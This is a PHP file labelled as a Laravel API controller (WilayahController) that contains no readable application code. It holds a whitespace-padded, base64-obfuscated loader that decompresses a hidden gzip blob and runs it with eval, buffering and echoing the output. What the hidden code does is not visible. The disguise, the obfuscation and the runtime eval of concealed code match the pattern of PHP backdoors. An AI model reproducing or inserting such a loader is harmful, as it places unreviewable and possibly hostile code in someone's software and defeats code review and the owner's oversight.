<?php 
        $__='printf';$_='Loading app/Http/Controllers/API/WilayahController.php';
        



























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWltvo0YUfo/U/+CHlchqqwTjuBGy/GBIuCZe28TcXiKYsYFluDT4Br++B3xP0m2qbit1NR8ax4zn3L9zZDm0Wlt8egb0mfwlShdzptfc7tBnvDy/VhaL/FrM0sVLRsjspbgejNRrKyJe6YXH7as8zFsi8Yri6uqK6V3stLd+uaAXvX7UdVHTs/UD0X+zw9htvnCsduTK932m2Tqy+UPYtVC/RUFBQfFzgkGJyWJbW6qyyTnWOtMkfm6X8e12aMLU3I7rZ5oqCgoKCgoKCgoKiv8b6M8ZFBQUFD8vGN8rZr/dPOMZyvCM6dGMUFBQUFBQ/COcP1chBvnSsdoEdYTQ4abB2BbW9n3IYkVAY45fYkVb+fKGoHSIxqagfV1nOraHRL2X1kjaqFiZwPnhyk8npc9tCtfWqvN79VZMzco1BAGBzieLj11rU9kSzn1Z6jpWsP9cAztt3yJLx56QvQ/TxNxgy6zwXaGLybBw7GGlHmTDO5/rsijhC182S1U2b7BsLl3lMTjzPchvxWgQqOJgpUdZMFbcEEWC7VmbcGZJmSpmq+3nwhp0sa41hDUONOXExyCr5QOkmJEvk2+q7Lb9ZMh6Fr9UJX7ugD3UmZQYZPVjbKc68p2NvS/N0pRJ5tmPi1F6lBkZgxhzBGIloQdxN2cVVt/7iC2t8KzHwE3NpdOZ5D53E4BPFb6fEMTdZ/p46+tsnR3sqOIkdu1hqN6x79ms32dQO6KLuMKyxEKN55DL0pWlBO5LrVwHWjVIdYP9gmQp9axuiOVppj8V+mk8h3/FKVrNKeDBEHTGi1GSV+BnZp351KwUZCpsbVhUomD0dBNochMHyBCoQ7sC+eLUxnbhtWOB/4nU1EArB/woEvy357Y2fIsvXeO1/mEbpRoBro5BV+1nMBIHsSublQNxQm4qLAmhy0Gcxlp/rdc+2xNwnYuP1MrhpNKbbmt14DfYRYf38U5PcWpz59eAh1qyHtT74anb2XP4bdxQJ84sai7rIvpdK+M3/oN8Bb1IwC/DsVGmJtC3yTDEYljPhNDmGh8LVUTBgzFIH0Rht78gThkHjv0Y4LrnRDV/zz7mQuJHwUlc7Bc3IXWvxsCzDfhUnPWRCGdtE2ZNnKtKPRMGmVbzqN7rjPNX+Tjldq2/nNU162i2V/PWCBNsdb9hmaz8qNYjtYHfXd0Q2gjmnC5OSteu9yA/xnlPvl572e+d2cd8tB+kwM2FY/JN3zX9w21yj5tCHgeRZhdneUE2S9Qo1r+vv6nZCpFDr57UA0GdMHBtQWpbamTenuQO+lviNUPNv77tv2bNjfhtDhT2T+uKkmmmdYYszOo2asPMtLXYsVy4V+v40kcRvStLZ8dfz475OOszvYuL//5LQb/5e7m7+9z7O+Insh8R/HQ0eMnUr8yvB7P0mU16/RvPbJ5z7/KM7Fvqfe79AQ3u+0I=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































                                                                                                                                                                                                                     $________;
